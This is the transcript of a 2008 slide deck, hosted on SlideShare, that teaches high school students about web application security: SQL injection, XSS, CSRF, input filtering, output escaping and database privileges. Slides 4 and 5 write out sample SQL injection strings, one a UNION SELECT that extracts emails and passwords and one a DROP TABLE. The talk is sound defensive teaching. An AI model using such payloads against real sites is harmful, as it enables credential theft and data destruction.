• Like
Web Application Security
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

Web Application Security

  • 1,086 views
Published

A talk for Damascus High School (Maryland) students.

A talk for Damascus High School (Maryland) students.

Published in Technology
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
No Downloads

Views

Total Views
1,086
On SlideShare
0
From Embeds
0
Number of Embeds
0

Actions

Shares
Downloads
47
Comments
0
Likes
1

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. Web Application Security Why is it important? Jason R. Leveille http://jasonleveille.com December 5, 2008 – Damascus High School
  • 2. Introduction
    • High School Teacher for 8 Years
    • Web Software Developer for 1.5
    • Security is not my strong point
      • Why am I talking about security?
    • Security is a concern in many layers
      • Server Layer (Apache, IIS, etc)
      • Database Layer (mySQL, PostreSQL, etc)
      • Application Language/Script (PHP, Python, etc)
      • Web App Server/Client Side
  • 3. A Brief Example: PHP info/secinfo
    • What we see when we look at phpinfo()
      • http://url/talk/psi/info.php
    • What we seen when we look at PHP Sec. Info feedback.
      • http://url/talk/psi/
      • Illustrates the need to secure your “language”, in your server environment, as best you can
  • 4. SQL Injection
    • What is SQL Injection
    • An example
      • Stealing usernames/passwords
      • http://url/talk/ex1.php (ex5.php)
      • ?userid=5
      • ?userid=5 union all select id,email,password from users—
      • What happened?
      • The Source Code
      • Things to think about
  • 5. SQL Injection
    • Another example
      • Drop Table
      • http://xkcd.com/327
      • http://url/talk/foo.php
      • ?first_name=Jason
      • ?first_name=Jason’; DROP TABLE users;
      • What happened?
      • An illustration in phpmyadmin
      • Things to think about?
  • 6. Cross Site Scripting (XSS)
    • What is XSS?
    • An Example
      • Cookie theft
      • http://url/talk/ex2.php
      • What happened?
      • The Source Code
      • Things to think about
  • 7. Cross Site Scripting (XSS)
    • A real world example
    • asp application / SQL Server attack
      • Combined XSS SQL Injection
      • Installation of malware
      • Our attack traced back to organized crime in Russia!
      • Should I not have written that …
  • 8. Cross Site Request Forgery (CSRF)
    • What is CSRF?
    • An Example
      • http://en.wikipedia.org/wiki/Cross-site_request_forgery#Example_and_characteristics
  • 9. Security: Filter Input
    • What is input?
    • What does it mean to filter input?
      • An example
        • http://url/talk/ex3.php
        • What’s happening?
        • The Source Code
        • Things to think about
  • 10. Security: Escape Output
    • What is output?
    • What does it mean to escape output?
      • An example
        • http://url/talk/ex4.php
        • What’s happening?
        • The Source Code
        • Things to think about
  • 11. Security: Database User Privileges
    • What are user privileges?
    • Reducing user privileges
      • An example
        • Creating a reduced user privileged account
        • Attempting DROP TABLE with this new account
        • Things to think about
  • 12. In Conclusion
    • Take care of your own information online
    • Never trust data coming into your application
    • Filter Input
    • Escape Output
    • Reduce Database User Privileges
    • Always store passwords hashed
      • See example of student passwords
  • 13. Questions?
    • http://jasonleveille.com
    • leveillej at gmail dot com
  • 14. Resources
    • http://www.apachesecurity.net/
    • http://www.microsoft.com/technet/security/prodtech/IIS.mspx
    • http://www.scribd.com/doc/2569459/Securing-MySQL-for-a-Security-Audit
    • http://www.postgresql.org/docs/8.3/static/user-manag.html
    • http://phpsec.org/projects/phpsecinfo/index.html
  • 15. Resources
    • http://dev. mysql .com/tech-resources/articles/guide-to-php-security-ch3.pdf
    • http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
    • http://xkcd.com/327/
    • http://xssed.org/
    • http://www.trustedsource.org/blog/142/New-SQL-Injection-Attack-Infecting-Machines
  • 16. Resources
    • http://shiflett.org/articles/cross-site-request-forgeries
    • http://php.net/ctype
    • http://us3.php.net/strip-tags
    • http://us2.php.net/manual/en/book.pcre.php
    • http://ha.ckers.org/xss.html
    • http://shiflett.org/blog/2007/mar/allowing-html-and-preventing-xss
  • 17. Resources
    • http://us.php.net/htmlentities
    • http://shiflett.org/blog/2007/may/character-encoding-and-xss
    • http://htmlpurifier.org/
    • http://us.php.net/manual/en/mysqli.real-escape-string.php